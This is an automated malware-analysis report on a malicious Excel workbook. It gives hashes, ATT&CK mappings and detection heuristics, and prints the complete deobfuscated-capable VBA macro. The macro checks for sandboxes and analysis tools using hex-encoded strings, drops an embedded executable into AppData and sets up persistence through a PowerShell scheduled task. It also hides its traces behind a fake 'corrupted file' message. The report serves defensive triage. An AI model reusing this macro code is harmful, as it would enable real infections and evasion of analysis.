Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 da31c5fa2d502f03…

MALICIOUS

Office (OOXML) / .XLSX

427.8 KB Created: 2026-01-09 02:09:33 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2026-06-10
MD5: 733521f9972d0104d8d6ec6f077a0c9c SHA-1: ef8b637b435566f691e5fd568ed0fbd43025582f SHA-256: da31c5fa2d502f03e4116cf6aa47c7c42d88513388afa4791ada9be4b5819300
318 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File

The sample is an Excel document containing obfuscated VBA macros designed to execute a second-stage payload. The Auto_Open macro checks for the existence of a log file, and if not present, proceeds to execute a payload. The script attempts to create a persistence mechanism via a Run key and drops an executable to the public documents folder. The VBA code references PowerShell, indicating a likely PowerShell execution.

Heuristics 11

  • VBA project inside OOXML medium 7 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
    ret = tltoiypblwfmg.Run("powershell.exe -NoProfile -ExecutionPolicy Bypass -File """ & tempPsFile & """", rktgglfckhihll, True)
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set wmi = GetObject(fjcqijtguecrunm("77696e") & fjcqijtguecrunm("6d676d74733a5c5c2e5c726f6f745c63696d7632"))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    CreateObject(fjcqijtguecrunm("5368656c6c2e4170706c6963617469") & fjcqijtguecrunm("6f6e")) _
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set wmi = GetObject(fjcqijtguecrunm("77696e") & fjcqijtguecrunm("6d676d74733a5c5c2e5c726f6f745c63696d7632"))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    eeaqtcpxkzogqtzdwo = Environ("TEMP") & "\update.log"
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 6

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 18025 bytes
SHA-256: 7df27ea9e2ef762732567ba34caec15ab91882bdd08a65cc1be6e744d055dbee
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
Const uzcbzqxqhhmumu = 2
Const fcneuescivdpylq = 1
Const rktgglfckhihll = 0
Sub Auto_Open()
Dim eeaqtcpxkzogqtzdwo As String
eeaqtcpxkzogqtzdwo = Environ("TEMP") & "\update.log"
If Len(Dir(eeaqtcpxkzogqtzdwo)) > 0 Then
Call fxwlgevalafcsugxa
Exit Sub
End If
If prybyabgzifwq() Then
Call fxwlgevalafcsugxa
Else
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e6e6f74") & fjcqijtguecrunm("206265206f70656e65642e"), vbCritical
Exit Sub
End If
End Sub
Function prybyabgzifwq() As Boolean
Dim wmi As Object
Dim oymvnnmuce As Integer
Dim availableMemory As Double
Dim totalDiskSpace As Double
Dim systemDrive As String
Dim mwbjfhpamwtf As Object
Dim qzjyuryxjjmaw As Variant
qzjyuryxjjmaw = Array(fjcqijtguecrunm("6369732e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("636d6476697274682e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("616c697665") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("66696c6577617463686572") & fjcqijtguecrunm("736572766963652e657865"), fjcqijtguecrunm("6e67") & fjcqijtguecrunm("766d7376632e657865"), fjcqijtguecrunm("73616e") & fjcqijtguecrunm("64626f78696572706373732e657865"), _
fjcqijtguecrunm("616e") & fjcqijtguecrunm("616c797a65722e657865"), fjcqijtguecrunm("666f7274") & fjcqijtguecrunm("697472616365722e657865"), fjcqijtguecrunm("6e73766572") & fjcqijtguecrunm("63746c2e657865"), fjcqijtguecrunm("736269656374") & fjcqijtguecrunm("726c2e657865"), fjcqijtguecrunm("616e") & fjcqijtguecrunm("676172322e657865"), fjcqijtguecrunm("676f617463") & fjcqijtguecrunm("61737065722e657865"), _
fjcqijtguecrunm("6f6c6c796462672e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("736269657376632e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("6170696d6f6e6974") & fjcqijtguecrunm("6f722e657865"), fjcqijtguecrunm("476f6174436c69656e74417070") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("706569642e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("7363616e686f73742e65") & fjcqijtguecrunm("7865"), _
fjcqijtguecrunm("6170697370") & fjcqijtguecrunm("792e657865"), fjcqijtguecrunm("686965") & fjcqijtguecrunm("7733322e657865"), fjcqijtguecrunm("7065") & fjcqijtguecrunm("726c2e657865"), fjcqijtguecrunm("73636b746f6f6c") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("61706973707933322e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("686f6f") & fjcqijtguecrunm("6b616e616170702e657865"), fjcqijtguecrunm("7065746f") & fjcqijtguecrunm("6f6c732e657865"), _
fjcqijtguecrunm("7364") & fjcqijtguecrunm("636c742e657865"), fjcqijtguecrunm("6173") & fjcqijtguecrunm("7572612e657865"), fjcqijtguecrunm("686f6f6b657870") & fjcqijtguecrunm("6c6f7265722e657865"), fjcqijtguecrunm("706578706c6f7265") & fjcqijtguecrunm("722e657865"), fjcqijtguecrunm("7366746463") & fjcqijtguecrunm("632e657865"), fjcqijtguecrunm("617574") & fjcqijtguecrunm("6f7265706775692e657865"), fjcqijtguecrunm("687474706c6f67") & fjcqijtguecrunm("2e657865"), _
fjcqijtguecrunm("70696e67") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("73687574646f") & fjcqijtguecrunm("776e6d6f6e2e657865"), fjcqijtguecrunm("6175") & fjcqijtguecrunm("746f72756e732e657865"), fjcqijtguecrunm("6963") & fjcqijtguecrunm("6573776f72642e657865"), fjcqijtguecrunm("707230633378702e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("736e6966666869") & fjcqijtguecrunm("742e657865"), _
fjcqijtguecrunm("6175746f72756e7363") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("69636c69636b65722d72656c") & fjcqijtguecrunm("656173652e657865"), fjcqijtguecrunm("7072696e63") & fjcqijtguecrunm("652e657865"), fjcqijtguecrunm("736e6f6f702e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("6175746f73637265656e73") & fjcqijtguecrunm("686f747465722e657865"), fjcqijtguecrunm("696461") & fjcqijtguecrunm("672e657865"), _
fjcqijtguecrunm("7072") & fjcqijtguecrunm("6f63616e616c797a65722e657865"), fjcqijtguecrunm("73706b") & fjcqijtguecrunm("726d6f6e2e657865"), fjcqijtguecrunm("6176637465737473756974652e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("696461") & fjcqijtguecrunm("6736342e657865"), fjcqijtguecrunm("70726f636573736861636b") & fjcqijtguecrunm("65722e657865"), fjcqijtguecrunm("737973616e616c797a") & fjcqijtguecrunm("65722e657865"), _
fjcqijtguecrunm("61767a2e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("6964") & fjcqijtguecrunm("61712e657865"), fjcqijtguecrunm("70726f") & fjcqijtguecrunm("636573736d656d64756d702e657865"), fjcqijtguecrunm("7379736572") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("626568") & fjcqijtguecrunm("6176696f7264756d7065722e657865"), fjcqijtguecrunm("696d") & fjcqijtguecrunm("6d756e69747964656275676765722e657865"), _
fjcqijtguecrunm("70726f63") & fjcqijtguecrunm("6578702e657865"), fjcqijtguecrunm("737973") & fjcqijtguecrunm("74656d6578706c6f7265722e657865"), fjcqijtguecrunm("62696e6469") & fjcqijtguecrunm("66662e657865"), fjcqijtguecrunm("696d706f7274") & fjcqijtguecrunm("7265632e657865"), fjcqijtguecrunm("70726f6365787036342e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("73797374656d6578706c") & fjcqijtguecrunm("6f726572736572766963652e657865"), _
fjcqijtguecrunm("425450") & fjcqijtguecrunm("5472617949636f6e2e657865"), fjcqijtguecrunm("696d") & fjcqijtguecrunm("756c2e657865"), fjcqijtguecrunm("70726f636d") & fjcqijtguecrunm("6f6e2e657865"), fjcqijtguecrunm("7379") & fjcqijtguecrunm("74686f6e2e657865"), fjcqijtguecrunm("63617074757265") & fjcqijtguecrunm("6261742e657865"), fjcqijtguecrunm("496e666f63") & fjcqijtguecrunm("6c69656e742e657865"), fjcqijtguecrunm("70726f636d6f6e3634") & fjcqijtguecrunm("2e657865"), _
fjcqijtguecrunm("7461736b6d") & fjcqijtguecrunm("67722e657865"), fjcqijtguecrunm("636462") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("696e7374616c6c72697465") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("7079") & fjcqijtguecrunm("74686f6e2e657865"), fjcqijtguecrunm("7461736c6f67696e2e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("6366") & fjcqijtguecrunm("666578706c6f7265722e657865"), fjcqijtguecrunm("697066") & fjcqijtguecrunm("732e657865"), _
fjcqijtguecrunm("70797468") & fjcqijtguecrunm("6f6e772e657865"), fjcqijtguecrunm("74637064756d70") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("636c69636b73686172656c61756e63") & fjcqijtguecrunm("6865722e657865"), fjcqijtguecrunm("6970726f7365746d6f6e69746f722e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("7171") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("74637076696577") & fjcqijtguecrunm("2e657865"), _
fjcqijtguecrunm("636c") & fjcqijtguecrunm("6f7365706f7075702e657865"), fjcqijtguecrunm("69726167656e74") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("717166666f2e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("717170726f74656374") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("746f74616c636d642e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("63706f727473") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("6a6f65626f78636f6e74726f") & fjcqijtguecrunm("6c2e657865"), _
fjcqijtguecrunm("717173") & fjcqijtguecrunm("672e657865"), fjcqijtguecrunm("7472") & fjcqijtguecrunm("6f6a6469652e6b767063726f7373666972652e657865"), fjcqijtguecrunm("6a6f65626f787365") & fjcqijtguecrunm("727665722e657865"), fjcqijtguecrunm("7261") & fjcqijtguecrunm("70746f72636c69656e742e657865"), fjcqijtguecrunm("7478706c617466") & fjcqijtguecrunm("6f726d2e657865"), fjcqijtguecrunm("646e662e") & fjcqijtguecrunm("657865"), _
fjcqijtguecrunm("6c616d65722e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("7265676d6f") & fjcqijtguecrunm("6e2e657865"), fjcqijtguecrunm("76697275732e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("64736e6966") & fjcqijtguecrunm("662e657865"), fjcqijtguecrunm("4c6f674854") & fjcqijtguecrunm("54502e657865"), fjcqijtguecrunm("72656773686f742e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("76782e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("64756d706361702e65") & fjcqijtguecrunm("7865"), _
fjcqijtguecrunm("6c6f72647065") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("5265704d677236342e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("7769") & fjcqijtguecrunm("6e616c797369732e657865"), fjcqijtguecrunm("656d756c") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("6d616c6d") & fjcqijtguecrunm("6f6e2e657865"), fjcqijtguecrunm("5265705574696c7333322e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("77696e6170696f766572") & fjcqijtguecrunm("7269646533322e657865"), _
fjcqijtguecrunm("657468") & fjcqijtguecrunm("657265616c2e657865"), fjcqijtguecrunm("6d626172") & fjcqijtguecrunm("756e2e657865"), fjcqijtguecrunm("5265") & fjcqijtguecrunm("7055782e657865"), fjcqijtguecrunm("7769") & fjcqijtguecrunm("6e6462672e657865"), fjcqijtguecrunm("657474657263") & fjcqijtguecrunm("61702e657865"), fjcqijtguecrunm("6d64706d6f6e") & fjcqijtguecrunm("2e657865"), fjcqijtguecrunm("72756e73616d706c65") & fjcqijtguecrunm("2e657865"), _
fjcqijtguecrunm("77696e") & fjcqijtguecrunm("64756d702e657865"), fjcqijtguecrunm("66616b656874747073") & fjcqijtguecrunm("65727665722e657865"), fjcqijtguecrunm("6d6d722e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("7361") & fjcqijtguecrunm("6d7031652e657865"), fjcqijtguecrunm("77696e7370792e65") & fjcqijtguecrunm("7865"), fjcqijtguecrunm("6661") & fjcqijtguecrunm("6b657365727665722e657865"), fjcqijtguecrunm("73616d706c652e") & fjcqijtguecrunm("657865"), _
fjcqijtguecrunm("77697265736861") & fjcqijtguecrunm("726b2e657865"), fjcqijtguecrunm("6c67") & fjcqijtguecrunm("6875625f6167656e742e657865"), fjcqijtguecrunm("44656c6c4f7074696d697a65") & fjcqijtguecrunm("722e657865"), fjcqijtguecrunm("46696464") & fjcqijtguecrunm("6c65722e657865"), fjcqijtguecrunm("6d756c746970") & fjcqijtguecrunm("6f742e657865"), fjcqijtguecrunm("73616e64626f78696563") & fjcqijtguecrunm("727970746f2e657865"), fjcqijtguecrunm("5858582e") & fjcqijtguecrunm("657865"), fjcqijtguecrunm("66696c656d") & fjcqijtguecrunm("6f6e2e657865"), fjcqijtguecrunm("6e6574736e696666") & fjcqijtguecrunm("65722e657865"), _
fjcqijtguecrunm("73616e64626f78") & fjcqijtguecrunm("696564636f6d6c61756e63682e657865"))
On Error Resume Next
Set wmi = GetObject(fjcqijtguecrunm("77696e") & fjcqijtguecrunm("6d676d74733a5c5c2e5c726f6f745c63696d7632"))
systemDrive = wmi.ExecQuery(fjcqijtguecrunm("53656c6563742053797374656d44726976652066726f6d2057696e33325f4f7065726174696e") & fjcqijtguecrunm("6753797374656d")).ItemIndex(0).systemDrive
systemDrive = Left(systemDrive, uzcbzqxqhhmumu)
oymvnnmuce = wmi.ExecQuery(fjcqijtguecrunm("53656c656374204e756d6265724f664c6f676963616c50726f636573736f72732066726f6d") & fjcqijtguecrunm("2057696e33325f436f6d707574657253797374656d")).ItemIndex(0).NumberOfLogicalProcessors
If oymvnnmuce < 2 Then
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e6e6f7420") & fjcqijtguecrunm("6265206f70656e65642e"), vbCritical
prybyabgzifwq = False
Exit Function
End If
totalMemory = wmi.ExecQuery(fjcqijtguecrunm("53656c65637420546f74616c506879736963616c4d656d6f72792066726f6d2057696e") & fjcqijtguecrunm("33325f436f6d707574657253797374656d")).ItemIndex(0).TotalPhysicalMemory / (1024 ^ 2)
If totalMemory < 2048 Then
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e6e6f7420626520") & fjcqijtguecrunm("6f70656e65642e"), vbCritical
prybyabgzifwq = False
Exit Function
End If
Set mwbjfhpamwtf = wmi.ExecQuery(fjcqijtguecrunm("53656c6563742053697a652066726f6d205769") & fjcqijtguecrunm("6e33325f4c6f676963616c4469736b2077686572652044657669636549443d27") & systemDrive & fjcqijtguecrunm("27")).ItemIndex(0)
totalDiskSpace = mwbjfhpamwtf.Size / (1024 ^ 3)
If totalDiskSpace < 40 Then
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e6e6f742062") & fjcqijtguecrunm("65206f70656e65642e"), vbCritical
prybyabgzifwq = False
Exit Function
End If
Dim iqtqwkwi, pf, hasPagefile
hasPagefile = False
Set iqtqwkwi = wmi.ExecQuery(fjcqijtguecrunm("53656c656374202a206672") & fjcqijtguecrunm("6f6d2057696e33325f5061676546696c655573616765"))
For Each pf In iqtqwkwi
If pf.AllocatedBaseSize > 0 Then
hasPagefile = True
Exit For
End If
Next
If Not hasPagefile Then
Set iqtqwkwi = wmi.ExecQuery(fjcqijtguecrunm("53656c656374202a2066726f6d2057696e33325f5061676546696c65536574") & fjcqijtguecrunm("74696e67"))
For Each pf In iqtqwkwi
If pf.InitialSize > 0 Or pf.MaximumSize > 0 Then
hasPagefile = True
Exit For
End If
Next
End If
If Not hasPagefile Then
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e6e6f74206265206f70656e65") & fjcqijtguecrunm("642e"), vbCritical
prybyabgzifwq = False
Exit Function
End If
If erwujsbpnjxxngev(qzjyuryxjjmaw) Then
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e6e6f7420") & fjcqijtguecrunm("6265206f70656e65642e"), vbCritical
prybyabgzifwq = False
Exit Function
End If
prybyabgzifwq = True
End Function
Function erwujsbpnjxxngev(qzjyuryxjjmaw As Variant) As Boolean
Dim wmi As Object
Dim nputyvsxsfm As Object
Dim uhkggqremlmhrxfao As Object
Dim nhhfuxec As Integer
On Error Resume Next
Set wmi = GetObject(fjcqijtguecrunm("77696e6d676d74733a5c5c2e5c72") & fjcqijtguecrunm("6f6f745c63696d7632"))
Set nputyvsxsfm = wmi.ExecQuery(fjcqijtguecrunm("53656c656374202a2066726f6d2057696e33325f50726f") & fjcqijtguecrunm("63657373"))
For Each uhkggqremlmhrxfao In nputyvsxsfm
For nhhfuxec = LBound(qzjyuryxjjmaw) To UBound(qzjyuryxjjmaw)
If LCase(uhkggqremlmhrxfao.Name) = LCase(qzjyuryxjjmaw(nhhfuxec)) Then
erwujsbpnjxxngev = True
Exit Function
End If
Next nhhfuxec
Next uhkggqremlmhrxfao
erwujsbpnjxxngev = False
End Function
Sub fxwlgevalafcsugxa()
Dim nhrxmkdgxwoeqmqqnc As String
Dim pjmhbxidgkmaxgt As String
Dim ugabspcm As Object
Dim qtmcgbayej As String
Dim edobzwkbnyoi As String
Dim obgbnfap As String
Dim aeqwnanbmwej As String
Dim tpltnqekmtcxyqe As String
ActiveSheet.OLEObjects(fjcqijtguecrunm("4f626a") & fjcqijtguecrunm("6563742031")).Copy
CreateObject(fjcqijtguecrunm("5368656c6c2e4170706c6963617469") & fjcqijtguecrunm("6f6e")) _
.Namespace(ActiveWorkbook.Path) _
.Self.InvokeVerb fjcqijtguecrunm("506173") & fjcqijtguecrunm("7465")
filePath = ActiveWorkbook.Path & fjcqijtguecrunm("5c696d6167") & fjcqijtguecrunm("652e6a7067")
appDataPath = CreateObject(fjcqijtguecrunm("575363726970742e53") & fjcqijtguecrunm("68656c6c")).SpecialFolders(fjcqijtguecrunm("417070") & fjcqijtguecrunm("44617461"))
tpltnqekmtcxyqe = appDataPath & fjcqijtguecrunm("5c4d534f66") & fjcqijtguecrunm("666963655c")
If Dir(tpltnqekmtcxyqe, vbDirectory) = "" Then
MkDir tpltnqekmtcxyqe
Else
Kill filePath
Exit Sub
End If
obgbnfap = tpltnqekmtcxyqe & fjcqijtguecrunm("6d737375") & fjcqijtguecrunm("73622e657865") '
FileCopy filePath, obgbnfap
Set ugabspcm = CreateObject(fjcqijtguecrunm("5753") & fjcqijtguecrunm("63726970742e5368656c6c"))
nhrxmkdgxwoeqmqqnc = fjcqijtguecrunm("557064617465546173") & fjcqijtguecrunm("6b4d616368696e65")
aeqwnanbmwej = fjcqijtguecrunm("7374") & fjcqijtguecrunm("617274")
tempPsFile = Environ("TEMP") & "\CreateTask_" & Format(Now, "yyyymmdd_hhnnss") & "_" & Int((10000) * Rnd) & ".ps1"
psCommand = fjcqijtguecrunm("696620282d4e6f7420284765742d5363686564756c65645461736b202d5461736b4e") & fjcqijtguecrunm("616d652027") & nhrxmkdgxwoeqmqqnc & fjcqijtguecrunm("27202d4572726f72416374696f6e2053696c656e746c79436f") & fjcqijtguecrunm("6e74696e75652929207b") & vbCrLf & _
fjcqijtguecrunm("2020202024737461727454696d65203d20284765742d44") & fjcqijtguecrunm("617465292e4164644d696e75746573283239292e546f537472696e67282748483a6d6d2729") & vbCrLf & _
fjcqijtguecrunm("2020202024616374696f6e203d204e65772d5363686564756c65645461736b416374696f6e202d45786563757465") & fjcqijtguecrunm("2027") & obgbnfap & fjcqijtguecrunm("27202d417267756d656e74") & fjcqijtguecrunm("2027") & aeqwnanbmwej & fjcqijtguecrunm("27202d576f726b696e67") & fjcqijtguecrunm("4469726563746f72792027") & tpltnqekmtcxyqe & fjcqijtguecrunm("27") & vbCrLf & _
fjcqijtguecrunm("202020202474726967676572203d204e65772d5363686564756c65645461736b54726967676572202d4461696c") & fjcqijtguecrunm("79202d41742024737461727454696d65") & vbCrLf & _
fjcqijtguecrunm("2020202052656769737465722d5363686564") & fjcqijtguecrunm("756c65645461736b202d5461736b4e616d652027") & nhrxmkdgxwoeqmqqnc & fjcqijtguecrunm("27202d416374696f6e2024616374696f6e") & fjcqijtguecrunm("202d54726967676572202474726967676572202d466f726365") & vbCrLf & _
fjcqijtguecrunm("7d")
Dim irunxnvgqdvx As Object, rowahtvsmgbfkhe As Object
Set irunxnvgqdvx = CreateObject(fjcqijtguecrunm("536372697074696e672e") & fjcqijtguecrunm("46696c6553797374656d4f626a656374"))
Set rowahtvsmgbfkhe = irunxnvgqdvx.CreateTextFile(tempPsFile, True, True)
rowahtvsmgbfkhe.Write psCommand
rowahtvsmgbfkhe.Close
Set tltoiypblwfmg = CreateObject(fjcqijtguecrunm("575363726970742e5368") & fjcqijtguecrunm("656c6c"))
ret = tltoiypblwfmg.Run("powershell.exe -NoProfile -ExecutionPolicy Bypass -File """ & tempPsFile & """", rktgglfckhihll, True)
On Error Resume Next
irunxnvgqdvx.DeleteFile tempPsFile, True
On Error GoTo 0
Kill filePath
MsgBox fjcqijtguecrunm("5468652066696c6520697320636f7272757074656420616e642063616e") & fjcqijtguecrunm("6e6f74206265206f70656e65642e2e2e"), vbCritical
End Sub

Attribute VB_Name = "Module2"
Function fjcqijtguecrunm(ByVal rtkhffdrz As String) As String
Dim hdwzvgtoxf As Long
For hdwzvgtoxf = 1 To Len(rtkhffdrz) Step 2
fjcqijtguecrunm = fjcqijtguecrunm & Chr$(Val("&H" & Mid$(rtkhffdrz, hdwzvgtoxf, 2)))
Next hdwzvgtoxf
End Function
ooxml_oleobject_00.bin ooxml-ole-object OOXML embedded OLE part: xl/embeddings/oleObject1.bin 712192 bytes
SHA-256: 70157f517e8e7622f49eb112d8d4a10f08dac3a15857c3d92ac07a49bf869d89
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.52, consistent with packed or encrypted content.
ooxml_oleobject_00_ole10native_00.bin ole-package OOXML xl/embeddings/oleObject1.bin Ole10Native stream: Ole10Native 705064 bytes
SHA-256: c4b54097f7a1ccb0a4e4a10497431b8d938a7ac0e030b18cf258cb2eb3c8adb6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.55, consistent with packed or encrypted content.
ooxml_oleobject_00_ole10native_00_image.jpg ole-package-payload OOXML xl/embeddings/oleObject1.bin Ole10Native payload: display_name=image.jpg; full_path=C:\Users\Admin\AppData\Local\Temp\{E4D8AFD4-B54C-448A-88EA-2CF8749DA8C9}\image.jpg; temp_path=; def_file= 704512 bytes
SHA-256: f2977b1f3f05c3e38d301232dccf059ba3bb6b126d1f892d7a338c3f9fcaa49e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.55, consistent with packed or encrypted content.
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 38400 bytes
SHA-256: 67063b951eca0481a6118f835ed6189b6d2062d46dcdae8cf0c6fe41703e7ef4
emf_00.emf ooxml-emf OOXML EMF part: xl/media/image1.emf 4988 bytes
SHA-256: 47b36d4917a574120d2728674abc24e9796871c1fc19eca067ce81eca3058888

Open this report in the interactive analyzer, or submit your own file for analysis.